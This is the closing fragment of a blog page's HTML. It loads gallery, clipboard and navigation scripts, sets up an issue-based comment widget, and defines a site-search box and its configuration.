        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><script>$.getScript('/js/comment-issue-data.js',function(){loadIssueData('0a75c84e24da4e774d10','80c72733da730b019e5047ae6c7eff937914a4d9','ggb0n','blog_comment',false);})</script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>